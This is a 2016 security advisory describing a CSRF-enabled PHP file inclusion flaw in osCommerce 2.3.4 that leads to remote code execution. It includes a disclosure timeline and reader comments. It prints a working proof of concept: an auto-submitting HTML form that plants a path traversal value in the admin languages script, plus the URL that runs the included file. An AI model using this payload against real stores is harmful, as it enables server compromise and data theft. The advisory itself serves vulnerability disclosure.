Stay in Touch

Weekly newsletter on AI, Application Security & Cybercrime


Your data will stay confidential Private and Confidential

RCE via CSRF in osCommerce

Advisory ID:HTB23284
Product:osCommerce
Vendor:osCommerce
Vulnerable Versions:2.3.4 and probably prior
Tested Version:2.3.4
Advisory Publication:December 21, 2015 [without technical details]
Vendor Notification:December 21, 2015
Public Disclosure:February 17, 2016
Vulnerability Type:PHP File Inclusion [CWE-98]
CVE Reference:Pending
Risk Level:Medium
CVSSv3 Base Score:5.8 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L]
CVSSv3 Calculator
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in popular e-commerce software osCommerce with 280,000 store owners (according to the vendor). The vulnerability can be exploited to execute arbitrary PHP code on the remote system, compromise the vulnerable web application, its database and even the web server and related environment.

Successful exploitation of the vulnerability requires attacker to access to administrative panel, however it can also be successfully exploited by remote non-authenticated attacker via CSRF vector to which the application is also vulnerable.

The vulnerability exists due to insufficient filtration of "directory" HTTP POST parameter paassed to "/admin/languages.php" PHP script. A remote attacker can use path traversal sequences (e.g. "../../") to include and execute arbitrary PHP file from local server file system.

A simple CSRF exploit below will update application database and insert "/tmp/file" value string into web application configuration:

<form action="http://[HOST]/admin/languages.php?action=insert" method="post" name="main">
<input type="hidden" name="name" value="vu">
<input type="hidden" name="code" value="vu">
<input type="hidden" name="image" value="icon.gif">
<input type="hidden" name="directory" value="../../../../../../../../../../../tmp/file">
<input type="hidden" name="sort_order" value="">
<input value="submit" id="btn" type="submit" />
</form><script>document.main.submit();</script>


Then, in order to execute the PHP code from "/tmp/file" file, just open the following URL:
http://[host]/index.php?language=vu

How to Detect PHP File Inclusion Vulnerabilities
Free Website Security Test
  • Non-intrusive GDPR Test
  • Non-intrusive PCI DSS Test
Try Free Test
ImmuniWeb® On-Demand
  • Complete GDPR Audit
  • Complete PCI DSS Audit
  • Remediation Guidelines
  • DevSecOps Integration
Learn More

Solution:
Disclosure timeline:
2015-12-21 Vendor notified via emails, no reply.
2016-01-06 Vendor notified via emails and forum, no reply.
2016-01-13 Fix Requested via emails, no reply.
2016-01-19 Fix Requested via emails, no reply.
2016-02-17 Public disclosure.

Currently we are not aware of any official solution for this vulnerability.


References:
[1] High-Tech Bridge Advisory HTB23284 - https://www.immuniweb.com/advisory/HTB23284 - RCE via CSRF in osCommerce
[2] osCommerce - http://www.oscommerce.com/ - osCommerce Online Merchant is a complete self-hosted online store solution that contains both a catalog frontend and an administration tool backend which can be easily installed and configured through a web-based installation procedure.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - Leveraging the power of machine-learning and genius of human brain to deliver the most advanced web application security and penetration testing.
[5] ImmuniWeb® SSLScan - Test your servers for security and compliance with PCI DSS, HIPAA and NIST.
User Comments
Add Comment
2 responses to "RCE via CSRF in osCommerce"
John 2016-02-23 18:18:44 UTC Comment this
In a properly configured oscommerce store, the admin directory is password-protected and not called admin.
High-Tech Bridge Security Research 2016-02-24 12:32:12 UTC Comment this
Yes, for better security it's recommended for change admin panel location, but it's not done by default.

Admin panel is obviously password-protected, this is why the exploitation vector is CSRF.
↑ Back to Top


Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Quick Start
Products
Free Trial
Newsletter